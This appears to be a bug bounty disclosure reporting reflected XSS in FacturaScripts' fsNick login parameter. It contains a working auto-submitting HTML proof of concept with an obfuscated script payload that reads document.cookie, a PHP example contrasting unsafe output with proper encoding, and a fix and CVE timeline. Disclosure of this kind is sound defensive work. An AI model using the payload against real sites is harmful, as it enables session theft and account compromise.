Reflected XSS in facturascripts in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

facturascripts is vulnerable to reflected XSS in the fsNick parameter.

Proof of Concept

Save this code as poc.html:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/" method="POST">
      <input type="hidden" name="fsNick" value="1&apos;&quot;&#40;&#41;&amp;&#37;&lt;acx&gt;&lt;ScRiPt&#32;&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;" />
      <input type="hidden" name="fsPassword" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Open the file in your browser; the XSS triggers.

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.
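
The report does not show where fsNick is reflected or what the fix commit changed, so the following is an added example, not FacturaScripts code and not the project's fix. It assumes a hypothetical login-failure fragment that echoes the submitted nick (function names and markup are illustrative) and contrasts raw output with HTML-context encoding, using the field value from the PoC above as input.

```php
<?php
declare(strict_types=1);

// Added illustration, not FacturaScripts code. Assumption: a login-failure
// response echoes the submitted fsNick into an HTML body and an attribute.

/** Vulnerable pattern: request data concatenated into markup unchanged. */
function renderNickUnsafe(string $nick): string
{
    return '<p class="error">Unknown user: ' . $nick . '</p>'
         . '<input type="text" name="fsNick" value="' . $nick . '">';
}

/** Hardened pattern: encode for the HTML context at the point of output. */
function renderNickSafe(string $nick): string
{
    $enc = htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<p class="error">Unknown user: ' . $enc . '</p>'
         . '<input type="text" name="fsNick" value="' . $enc . '">';
}

/**
 * Regression check: the template itself contains exactly 3 '<' and 8 '"'.
 * Any other count means input altered the markup structure.
 */
function hasInjectedMarkup(string $html): bool
{
    return substr_count($html, '<') !== 3 || substr_count($html, '"') !== 8;
}

// fsNick exactly as the PoC form sends it: the browser decodes the
// attribute's character references before submitting the field.
$nick = html_entity_decode(
    '1&apos;&quot;&#40;&#41;&amp;&#37;&lt;acx&gt;&lt;ScRiPt&#32;&gt;'
    . 'alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;',
    ENT_QUOTES | ENT_HTML5,
    'UTF-8'
);

$cases = ['unsafe' => renderNickUnsafe($nick), 'safe' => renderNickSafe($nick)];
foreach ($cases as $name => $html) {
    printf("%-6s injected=%s\n%s\n\n", $name, hasInjectedMarkup($html) ? 'yes' : 'no', $html);
}
```

The same structural check can be kept as a regression test for any template that reflects request parameters.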

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 2 years ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back 2 years ago
Carlos Garcia validated this vulnerability 2 years ago
minhnb11 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia marked this as fixed in 2022.06 with commit 73a659 2 years ago
The fix bounty has been dropped
Minh
2 years ago

Researcher


@admin Can you assign CVE for this report?

Jamie Slome
2 years ago

Sorted 👍
